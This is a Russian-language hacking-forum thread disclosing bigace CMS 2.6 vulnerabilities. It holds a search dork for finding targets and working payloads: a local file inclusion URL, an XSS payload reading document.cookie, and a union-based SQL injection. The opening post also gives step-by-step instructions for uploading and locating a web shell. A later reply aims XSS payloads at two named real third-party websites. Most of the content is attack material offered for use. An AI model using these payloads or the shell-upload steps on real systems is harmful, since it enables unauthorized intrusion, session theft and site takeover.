Уязвимости bigace CMS 2.6

Discussion in 'Веб-уязвимости' started by Dimi4, 23 Oct 2009.

  1. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Уязвимости bigace CMS 2.6

    Product: bigace CMS
    Version: 2.6
    Dork: "Powered by BIGACE 2.6"
    Site: www.bigace.de
    Found by: Dimi4
    Date: 23.10.09

    Local File Inclusion
    /public/index.php : 78 line

    PHP:
    // PROCESSING COMMAND INTERPRETER
                $COMMAND_FILE _BIGACE_DIR_ROOT '/system/command/' $GLOBALS['_BIGACE']['PARSER']->getCommand() . '.cmd.php';
            if (     file_exists($COMMAND_FILE) )
            {
                include_once (    $COMMAND_FILE);
    Need: magic_quotes_gpc = OFF


    Code:
    [COLOR=DimGray]http://localhost/test/bigace_2.6/[/COLOR][B][COLOR=Red]public/index.php?cmd=[evil_file].php%00[/COLOR][/B]&id=tpl-frameset_tADMIN_len

    Cross Site Scripting

    Code:
    [COLOR=DimGray]http://localhost/test/bigace_2.6/public/index.php?cmd=admin&[/COLOR]id=tpl-frameset_tADMIN_len[COLOR=Red]%3Cscript%3Ealert(document.cookie)%3C/script%3E[/COLOR]
    При просмотре логов, сработает алерт (http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=[id])

    SQL-injection
    Вы скажите да нахера нам скуля, если в админке уже? Так вот, для того чтобы узнать имя нашего шелла.

    system/admin/plugins/logging.php : 76 line

    PHP:
    if(isset($_GET['view']))
    {
            $values = array(
                            'ORDER_BY'          => '',
                            'LIMIT'             => '',
                            'WHERE_EXTENSION'   => " AND id='".$_GET['view']."'"
            );
        
            $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->loadStatement('logging_filter');
            $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sqlString$values);
            $entry $GLOBALS['_BIGACE']['SQL_HELPER']->execute($sqlString);
            $entry $entry->next();
    Code:
    [COLOR=DimGray]http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=[/COLOR][COLOR=Red]-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=[id]--+[/COLOR]
    Пошаговая заливка шелла:

    В админке:
    1. Идем в заливку файлов. Грузим свой шелл. Проверки на расширение нет. В результате получаем ИД, запоминаем. (Например ИД=3)
    2. С помощю скули получаем зашифрованое имя шелла:
    Code:
    http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=[COLOR=Red][B]3[/B][/COLOR]--+
    3. Получили допустим e449d2128602875bd6c84284a3458a42_1256285544.php

    Идем в
    http://localhost/test/bigace_2.6/consumer/cid1/items/file/[name]
     
    #1 Dimi4, 23 Oct 2009
    Last edited by a moderator: 23 Apr 2010
    14 people like this.
  2. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    слив РОА
     
    #2 Kakoytoxaker, 23 Apr 2010
    2 people like this.
  3. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    bigace CMS 2.6

    XSS
    Code:
    public/index.php?cmd=application&id="><script>alert('xss')</script>
    Пример нескольких сайтов:
    Code:
    http://www.ivao.ch/ba_cms/public/index.php?cmd=application&id="><script>alert('за тобой выехали=)')</script>
http://newgate-consulting.de/public/index.php?cmd=application&id="><script>alert('берегись')</script>
     
    #3 ~d0s~, 18 Dec 2010
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.